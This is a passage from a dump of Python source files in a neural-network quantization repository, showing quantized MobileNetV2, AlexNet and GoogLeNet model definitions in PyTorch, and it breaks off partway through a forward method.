c0 = 3\n t0 = int(32 * capacity) * 1\n c1 = int(16 * capacity)\n t1 = c1 * expansion\n c2 = int(24 * capacity)\n t2 = c2 * expansion\n c3 = int(32 * capacity)\n t3 = c3 * expansion\n c4 = int(64 * capacity)\n t4 = c4 * expansion\n c5 = int(96 * capacity)\n t5 = c5 * expansion\n c6 = int(160 * capacity)\n t6 = c6 * expansion\n c7 = int(320 * capacity)\n c8 = max(int(1280 * capacity), 1280)\n \n \n def activ(name, nc):\n if quantAct:\n if quantActSTENumLevels != None and quantActSTENumLevels > 0: \n return STEActivation(startEpoch=0, \n numLevels=quantActSTENumLevels)\n else:\n return StochasticActivation(*quant_schemes[name], nc)\n else: \n assert(quantActSTENumLevels == None or quantActSTENumLevels <= 0)\n return nn.ReLU(inplace=True)\n \n def conv2d(name, ni, no, kernel_size=3, stride=1, padding=1, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticConv2d(*quant_schemes[name], ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n else:\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias, \n numBits=weightInqBits, strategy=weightInqStrategy)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n \n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticLinear(*quant_schemes[name], ni, no, bias=bias)\n else:\n return INQLinear(ni, no, bias=bias, \n numBits=weightInqBits, strategy=weightInqStrategy)\n else: \n return nn.Linear(ni, no, bias=bias)\n \n assert(False) # IMPLEMENTATION INCOMPLETE!!!!\n \n # first block\n self.phi01_conv = nn.Conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n self.phi01_bn = nn.BatchNorm2d(t0)\n self.phi01_act = nn.ReLU6(inplace=True)\n self.phi02_conv = nn.Conv2d(t0, t0, kernel_size=3, stride=1, padding=1, groups=t0, bias=False)\n self.phi02_bn = nn.BatchNorm2d(t0)\n self.phi02_act = nn.ReLU6(inplace=True)\n self.phi03_conv = nn.Conv2d(t0, c1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi03_bn = nn.BatchNorm2d(c1)\n # second block\n self.phi04_conv = nn.Conv2d(c1, t1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi04_bn = nn.BatchNorm2d(t1)\n self.phi04_act = nn.ReLU6(inplace=True)\n self.phi05_conv = nn.Conv2d(t1, t1, kernel_size=3, stride=2, padding=1, groups=t1, bias=False)\n self.phi05_bn = nn.BatchNorm2d(t1)\n self.phi05_act = nn.ReLU6(inplace=True)\n self.phi06_conv = nn.Conv2d(t1, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi06_bn = nn.BatchNorm2d(c2)\n self.phi06_act = StochasticActivation(*quant_schemes['phi06_act'])\n self.phi07_conv = StochasticConv2d(*quant_schemes['phi07_conv'], c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi07_bn = nn.BatchNorm2d(t2)\n self.phi07_act = StochasticActivation(*quant_schemes['phi07_act'])\n self.phi08_conv = StochasticConv2d(*quant_schemes['phi08_conv'], t2, t2, kernel_size=3, stride=1, padding=1, groups=t2, bias=False)\n self.phi08_bn = nn.BatchNorm2d(t2)\n self.phi08_act = StochasticActivation(*quant_schemes['phi08_act'])\n self.phi09_conv = StochasticConv2d(*quant_schemes['phi09_conv'], t2, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi09_bn = nn.BatchNorm2d(c2)\n # third block\n self.phi10_conv = nn.Conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi10_bn = nn.BatchNorm2d(t2)\n self.phi10_act = nn.ReLU6(inplace=True)\n self.phi11_conv = nn.Conv2d(t2, t2, kernel_size=3, stride=2, padding=1, groups=t2, bias=False)\n self.phi11_bn = nn.BatchNorm2d(t2)\n self.phi11_act = nn.ReLU6(inplace=True)\n self.phi12_conv = nn.Conv2d(t2, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi12_bn = nn.BatchNorm2d(c3)\n self.phi12_act = StochasticActivation(*quant_schemes['phi12_act'])\n self.phi13_conv = StochasticConv2d(*quant_schemes['phi13_conv'], c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi13_bn = nn.BatchNorm2d(t3)\n self.phi13_act = StochasticActivation(*quant_schemes['phi13_act'])\n self.phi14_conv = StochasticConv2d(*quant_schemes['phi14_conv'], t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi14_bn = nn.BatchNorm2d(t3)\n self.phi14_act = StochasticActivation(*quant_schemes['phi14_act'])\n self.phi15_conv = StochasticConv2d(*quant_schemes['phi15_conv'], t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi15_bn = nn.BatchNorm2d(c3)\n self.phi15_act = StochasticActivation(*quant_schemes['phi15_act'])\n self.phi16_conv = StochasticConv2d(*quant_schemes['phi16_conv'], c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi16_bn = nn.BatchNorm2d(t3)\n self.phi16_act = StochasticActivation(*quant_schemes['phi16_act'])\n self.phi17_conv = StochasticConv2d(*quant_schemes['phi17_conv'], t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi17_bn = nn.BatchNorm2d(t3)\n self.phi17_act = StochasticActivation(*quant_schemes['phi17_act'])\n self.phi18_conv = StochasticConv2d(*quant_schemes['phi18_conv'], t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi18_bn = nn.BatchNorm2d(c3)\n # fourth block\n self.phi19_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi19_bn = nn.BatchNorm2d(t3)\n self.phi19_act = nn.ReLU6(inplace=True)\n self.phi20_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=2, padding=1, groups=t3, bias=False)\n self.phi20_bn = nn.BatchNorm2d(t3)\n self.phi20_act = nn.ReLU6(inplace=True)\n self.phi21_conv = nn.Conv2d(t3, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi21_bn = nn.BatchNorm2d(c4)\n self.phi21_act = StochasticActivation(*quant_schemes['phi21_act'])\n self.phi22_conv = StochasticConv2d(*quant_schemes['phi22_conv'], c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi22_bn = nn.BatchNorm2d(t4)\n self.phi22_act = StochasticActivation(*quant_schemes['phi22_act'])\n self.phi23_conv = StochasticConv2d(*quant_schemes['phi23_conv'], t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi23_bn = nn.BatchNorm2d(t4)\n self.phi23_act = StochasticActivation(*quant_schemes['phi23_act'])\n self.phi24_conv = StochasticConv2d(*quant_schemes['phi24_conv'], t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi24_bn = nn.BatchNorm2d(c4)\n self.phi24_act = StochasticActivation(*quant_schemes['phi24_act'])\n self.phi25_conv = StochasticConv2d(*quant_schemes['phi25_conv'], c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi25_bn = nn.BatchNorm2d(t4)\n self.phi25_act = StochasticActivation(*quant_schemes['phi25_act'])\n self.phi26_conv = StochasticConv2d(*quant_schemes['phi26_conv'], t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi26_bn = nn.BatchNorm2d(t4)\n self.phi26_act = StochasticActivation(*quant_schemes['phi26_act'])\n self.phi27_conv = StochasticConv2d(*quant_schemes['phi27_conv'], t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi27_bn = nn.BatchNorm2d(c4)\n self.phi27_act = StochasticActivation(*quant_schemes['phi27_act'])\n self.phi28_conv = StochasticConv2d(*quant_schemes['phi28_conv'], c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi28_bn = nn.BatchNorm2d(t4)\n self.phi28_act = StochasticActivation(*quant_schemes['phi28_act'])\n self.phi29_conv = StochasticConv2d(*quant_schemes['phi29_conv'], t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi29_bn = nn.BatchNorm2d(t4)\n self.phi29_act = StochasticActivation(*quant_schemes['phi29_act'])\n self.phi30_conv = StochasticConv2d(*quant_schemes['phi30_conv'], t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi30_bn = nn.BatchNorm2d(c4)\n # fifth block\n self.phi31_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi31_bn = nn.BatchNorm2d(t4)\n self.phi31_act = nn.ReLU6(inplace=True)\n self.phi32_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi32_bn = nn.BatchNorm2d(t4)\n self.phi32_act = nn.ReLU6(inplace=True)\n self.phi33_conv = nn.Conv2d(t4, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi33_bn = nn.BatchNorm2d(c5)\n self.phi33_act = StochasticActivation(*quant_schemes['phi33_act'])\n self.phi34_conv = StochasticConv2d(*quant_schemes['phi34_conv'], c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi34_bn = nn.BatchNorm2d(t5)\n self.phi34_act = StochasticActivation(*quant_schemes['phi34_act'])\n self.phi35_conv = StochasticConv2d(*quant_schemes['phi35_conv'], t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi35_bn = nn.BatchNorm2d(t5)\n self.phi35_act = StochasticActivation(*quant_schemes['phi35_act'])\n self.phi36_conv = StochasticConv2d(*quant_schemes['phi36_conv'], t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi36_bn = nn.BatchNorm2d(c5)\n self.phi36_act = StochasticActivation(*quant_schemes['phi36_act'])\n self.phi37_conv = StochasticConv2d(*quant_schemes['phi37_conv'], c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi37_bn = nn.BatchNorm2d(t5)\n self.phi37_act = StochasticActivation(*quant_schemes['phi37_act'])\n self.phi38_conv = StochasticConv2d(*quant_schemes['phi38_conv'], t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi38_bn = nn.BatchNorm2d(t5)\n self.phi38_act = StochasticActivation(*quant_schemes['phi38_act'])\n self.phi39_conv = StochasticConv2d(*quant_schemes['phi39_conv'], t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi39_bn = nn.BatchNorm2d(c5)\n # sixth block\n self.phi40_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi40_bn = nn.BatchNorm2d(t5)\n self.phi40_act = nn.ReLU6(inplace=True)\n self.phi41_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=2, padding=1, groups=t5, bias=False)\n self.phi41_bn = nn.BatchNorm2d(t5)\n self.phi41_act = nn.ReLU6(inplace=True)\n self.phi42_conv = nn.Conv2d(t5, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi42_bn = nn.BatchNorm2d(c6)\n self.phi42_act = StochasticActivation(*quant_schemes['phi42_act'])\n self.phi43_conv = StochasticConv2d(*quant_schemes['phi43_conv'], c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi43_bn = nn.BatchNorm2d(t6)\n self.phi43_act = StochasticActivation(*quant_schemes['phi43_act'])\n self.phi44_conv = StochasticConv2d(*quant_schemes['phi44_conv'], t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi44_bn = nn.BatchNorm2d(t6)\n self.phi44_act = StochasticActivation(*quant_schemes['phi44_act'])\n self.phi45_conv = StochasticConv2d(*quant_schemes['phi45_conv'], t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi45_bn = nn.BatchNorm2d(c6)\n self.phi45_act = StochasticActivation(*quant_schemes['phi45_act'])\n self.phi46_conv = StochasticConv2d(*quant_schemes['phi46_conv'], c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi46_bn = nn.BatchNorm2d(t6)\n self.phi46_act = StochasticActivation(*quant_schemes['phi46_act'])\n self.phi47_conv = StochasticConv2d(*quant_schemes['phi47_conv'], t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi47_bn = nn.BatchNorm2d(t6)\n self.phi47_act = StochasticActivation(*quant_schemes['phi47_act'])\n self.phi48_conv = StochasticConv2d(*quant_schemes['phi48_conv'], t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi48_bn = nn.BatchNorm2d(c6)\n # seventh block\n self.phi49_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi49_bn = nn.BatchNorm2d(t6)\n self.phi49_act = nn.ReLU6(inplace=True)\n self.phi50_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi50_bn = nn.BatchNorm2d(t6)\n self.phi50_act = nn.ReLU6(inplace=True)\n self.phi51_conv = nn.Conv2d(t6, c7, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi51_bn = nn.BatchNorm2d(c7)\n # classifier\n self.phi52_conv = nn.Conv2d(c7, c8, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi52_bn = nn.BatchNorm2d(c8)\n self.phi52_act = nn.ReLU6(inplace=True)\n self.phi53_avg = nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n self.phi53_fc = nn.Linear(c8, 1000)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n" }, { "alpha_fraction": 0.48528891801834106, "alphanum_fraction": 0.5144747495651245, "avg_line_length": 40.54679870605469, "blob_id": "c2de4c2880ec1cac2a0da0b5962b8fafc2dff248", "content_id": "e070445ec87e5444cb540759f75f166c184a7d1b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8463, "license_type": "permissive", "max_line_length": 98, "num_lines": 203, "path": "/quantlab/ImageNet/AlexNet/alexnet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation\n\n\nclass AlexNet(nn.Module):\n \"\"\"Quantized AlexNet (both weights and activations).\"\"\"\n def __init__(self, capacity=1, quant_schemes=None, \n quantAct=True, quantActSTENumLevels=None, quantWeights=True, \n weightInqSchedule=None, weightInqBits=None, weightInqLevels=None, \n weightInqStrategy=\"magnitude\", \n quantSkipFirstLayer=False, quantSkipLastLayer=False, \n withDropout=False, alternateSizes=False, weightInqQuantInit=None):\n \n super().__init__()\n \n assert(weightInqBits == None or weightInqLevels == None)\n if weightInqBits != None:\n print('warning: weightInqBits deprecated')\n if weightInqBits == 1:\n weightInqLevels = 2\n elif weightInqBits >= 2:\n weightInqLevels = 2**weightInqBits\n else:\n assert(False)\n \n def activ(name, nc):\n if quantAct:\n if quantActSTENumLevels != None and quantActSTENumLevels > 0: \n return STEActivation(startEpoch=0, \n numLevels=quantActSTENumLevels)\n else:\n return StochasticActivation(*quant_schemes[name], nc)\n else: \n assert(quantActSTENumLevels == None or quantActSTENumLevels <= 0)\n return nn.ReLU(inplace=True)\n \n def conv2d(name, ni, no, kernel_size=3, stride=1, padding=1, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticConv2d(*quant_schemes[name], ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n else:\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n \n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticLinear(*quant_schemes[name], ni, no, bias=bias)\n else:\n return INQLinear(ni, no, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Linear(ni, no, bias=bias)\n \n def dropout(p=0.5):\n if withDropout:\n return nn.Dropout(p)\n else:\n return nn.Identity()\n \n if alternateSizes:\n #following LQ-net\n c0 = 3\n c1 = int(96 * capacity)\n c2 = int(256 * capacity)\n c3 = int(384 * capacity)\n c4 = int(384 * capacity)\n c5 = 256\n nh = 4096\n else: \n c0 = 3\n c1 = int(64 * capacity)\n c2 = int(192 * capacity)\n c3 = int(384 * capacity)\n c4 = int(256 * capacity)\n c5 = 256\n nh = 4096\n \n \n # convolutional layers\n if quantSkipFirstLayer:\n self.phi1_conv = nn.Conv2d(c0, c1, kernel_size=11, \n stride=4, padding=2, bias=False)\n else:\n self.phi1_conv = conv2d('phi1_conv', c0, c1, kernel_size=11, \n stride=4, padding=2, bias=False)\n self.phi1_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi1_bn = nn.BatchNorm2d(c1)\n self.phi1_act = activ('phi1_act', c1)\n self.phi2_conv = conv2d('phi2_conv', c1, c2, kernel_size=5, padding=2, bias=False)\n self.phi2_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi2_bn = nn.BatchNorm2d(c2)\n self.phi2_act = activ('phi2_act', c2)\n self.phi3_conv = conv2d('phi3_conv', c2, c3, kernel_size=3, padding=1, bias=False)\n self.phi3_bn = nn.BatchNorm2d(c3)\n self.phi3_act = activ('phi3_act', c3)\n self.phi4_conv = conv2d('phi4_conv', c3, c4, kernel_size=3, padding=1, bias=False)\n self.phi4_bn = nn.BatchNorm2d(c4)\n self.phi4_act = activ('phi4_act', c4)\n self.phi5_conv = conv2d('phi5_conv', c4, c5, kernel_size=3, padding=1, bias=False)\n self.phi5_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi5_bn = nn.BatchNorm2d(c5)\n self.phi5_act = activ('phi5_act', c5)\n # fully connected layers\n self.phi6_do = dropout()\n self.phi6_fc = linear('phi6_fc', c5*6*6, nh, bias=False)\n self.phi6_bn = nn.BatchNorm1d(nh)\n self.phi6_act = activ('phi6_act', nh)\n self.phi7_do = dropout()\n self.phi7_fc = linear('phi7_fc', nh, nh, bias=False)\n self.phi7_bn = nn.BatchNorm1d(nh)\n self.phi7_act = activ('phi7_act', nh)\n \n if quantSkipLastLayer:\n self.phi8_fc = nn.Linear(nh, 1000, bias=False)\n else:\n self.phi8_fc = linear('phi8_fc', nh, 1000, bias=False)\n self.phi8_bn = nn.BatchNorm1d(1000)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n def forward(self, x, withStats=False):\n x = self.phi1_conv(x)\n x = self.phi1_mp(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_mp(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_conv(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_mp(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = x.view(-1, torch.Tensor(list(x.size()[-3:])).to(torch.int32).prod().item())\n x = self.phi6_do(x)\n x = self.phi6_fc(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n x = self.phi7_do(x)\n x = self.phi7_fc(x)\n x = self.phi7_bn(x)\n x = self.phi7_act(x)\n x = self.phi8_fc(x)\n x = self.phi8_bn(x)\n if withStats:\n stats = []\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi2_conv_w', self.phi2_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi4_conv_w', self.phi4_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n stats.append(('phi6_fc_w', self.phi6_fc.weight.data))\n stats.append(('phi7_fc_w', self.phi7_fc.weight.data))\n stats.append(('phi8_fc_w', self.phi8_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n\n\n\n\nif __name__ == '__main__':\n model = AlexNet(quantAct=False, quantWeights=True, \n weightInqSchedule={}, weightInqBits=2, \n weightInqStrategy=\"magnitude-SRQ\", \n quantSkipFirstLayer=True)\n \n import torchvision as tv\n modelRef = tv.models.alexnet(pretrained=True)\n stateDictRef = modelRef.state_dict()\n #batch normalization not in original model...?!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n" }, { "alpha_fraction": 0.8294573426246643, "alphanum_fraction": 0.8294573426246643, "avg_line_length": 31.25, "blob_id": "ec890295d521e7472571f60796a79e86256b48ea", "content_id": "9379a5b11bca46209a13e7b31ac274faf8d239c7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "permissive", "max_line_length": 55, "num_lines": 4, "path": "/quantlab/ImageNet/GoogLeNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .googlenet import GoogLeNet\n" }, { "alpha_fraction": 0.4886666536331177, "alphanum_fraction": 0.5300833582878113, "avg_line_length": 41.25352096557617, "blob_id": "75964c3e2bc0ef11073289b4cce3757e56ab05c6", "content_id": "0e769de6c616f1e9b765ceb3d490dd48d35d89cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12000, "license_type": "permissive", "max_line_length": 99, "num_lines": 284, "path": "/quantlab/ImageNet/GoogLeNet/googlenet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n# large parts of the code taken or adapted from torchvision\n\nimport warnings\nfrom collections import namedtuple\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#from quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\n#from quantlab.indiv.ste_ops import STEActivation\n\n\nmodel_urls = {\n # GoogLeNet ported from TensorFlow\n 'googlenet': 'https://download.pytorch.org/models/googlenet-1378be20.pth',\n}\n\nclass BasicConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, quantized=True, **kwargs):\n super(BasicConv2d, self).__init__()\n if quantized:\n self.conv = INQConv2d(in_channels, out_channels, bias=False, **kwargs)\n else:\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\nclass Inception(nn.Module):\n\n def __init__(self, in_channels, ch1x1, ch3x3red, ch3x3, ch5x5red, ch5x5, pool_proj,\n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n super(Inception, self).__init__()\n\n self.branch1 = BasicConv2d(in_channels, ch1x1, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n\n self.branch2 = nn.Sequential(\n BasicConv2d(in_channels, ch3x3red, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod),\n BasicConv2d(ch3x3red, ch3x3, kernel_size=3, padding=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n )\n\n self.branch3 = nn.Sequential(\n BasicConv2d(in_channels, ch5x5red, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod),\n BasicConv2d(ch5x5red, ch5x5, kernel_size=3, padding=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n )\n\n self.branch4 = nn.Sequential(\n nn.MaxPool2d(kernel_size=3, stride=1, padding=1, ceil_mode=True),\n BasicConv2d(in_channels, pool_proj, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n )\n\n def forward(self, x):\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n\n outputs = [branch1, branch2, branch3, branch4]\n return torch.cat(outputs, 1)\n\n\nclass GoogLeNet(nn.Module):\n\n def __init__(self, num_classes=1000, quant_schemes=None, \n quantWeights=True, quantAct=True,\n weightInqSchedule=None, weightInqLevels=None,\n weightInqStrategy=\"magnitude\", weightInqQuantInit=None,\n quantSkipFirstLayer=False, quantSkipLastLayer=False, pretrained=False):\n super().__init__()\n assert(quantAct == False)\n assert(quantSkipFirstLayer)\n assert(quantSkipLastLayer)\n\n self.conv1 = BasicConv2d(3, 64, quantized=False, \n kernel_size=7, stride=2, padding=3)\n \n self.maxpool1 = nn.MaxPool2d(3, stride=2, ceil_mode=True)\n self.conv2 = BasicConv2d(64, 64, kernel_size=1,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.conv3 = BasicConv2d(64, 192, kernel_size=3, padding=1,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.maxpool2 = nn.MaxPool2d(3, stride=2, ceil_mode=True)\n\n self.inception3a = Inception(192, 64, 96, 128, 16, 32, 32,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception3b = Inception(256, 128, 128, 192, 32, 96, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.maxpool3 = nn.MaxPool2d(3, stride=2, ceil_mode=True)\n\n self.inception4a = Inception(480, 192, 96, 208, 16, 48, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4b = Inception(512, 160, 112, 224, 24, 64, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4c = Inception(512, 128, 128, 256, 24, 64, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4d = Inception(512, 112, 144, 288, 32, 64, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4e = Inception(528, 256, 160, 320, 32, 128, 128,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.maxpool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)\n\n self.inception5a = Inception(832, 256, 160, 320, 32, 128, 128,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception5b = Inception(832, 384, 192, 384, 48, 128, 128,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.dropout = nn.Dropout(0.2)\n self.fc = nn.Linear(1024, num_classes)\n\n self._initialize_weights()\n \n \n if pretrained:\n from torch.hub import load_state_dict_from_url\n state_dict = load_state_dict_from_url(model_urls['googlenet'])\n missing_keys, unexpected_keys = self.load_state_dict(state_dict, strict=False)\n \n #filter out expected mismatches \n #(missing auxiliary outputs in model, missing INQ params in pretrained data)\n missing_keys_nonInq = [s for s in missing_keys \n if not (s.endswith('.sParam') or \n s.endswith('.weightFrozen'))]\n unexpected_keys_nonAux = [s for s in unexpected_keys \n if not s.startswith('aux')]\n\n assert(len(unexpected_keys_nonAux) == 0)\n assert(len(missing_keys_nonInq) == 0)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n def _initialize_weights(self):\n for m in self.modules():\n if (isinstance(m, nn.Conv2d) or \n isinstance(m, INQConv2d) or \n isinstance(m, nn.Linear)):\n \n import scipy.stats as stats\n X = stats.truncnorm(-2, 2, scale=0.01)\n values = torch.as_tensor(X.rvs(m.weight.numel()), dtype=m.weight.dtype)\n values = values.view(m.weight.size())\n with torch.no_grad():\n m.weight.copy_(values)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x, withStats=False):\n # N x 3 x 224 x 224\n x = self.conv1(x)\n # N x 64 x 112 x 112\n x = self.maxpool1(x)\n # N x 64 x 56 x 56\n x = self.conv2(x)\n # N x 64 x 56 x 56\n x = self.conv3(x)\n # N x 192 x 56 x 56\n x = self.maxpool2(x)\n # N x 192 x 28 x 28\n x = self.inception3a(x)\n # N x 256 x 28 x 28\n x = self.inception3b(x)\n # N x 480 x 28 x 28\n x = self.maxpool3(x)\n # N x 480 x 14 x 14\n x = 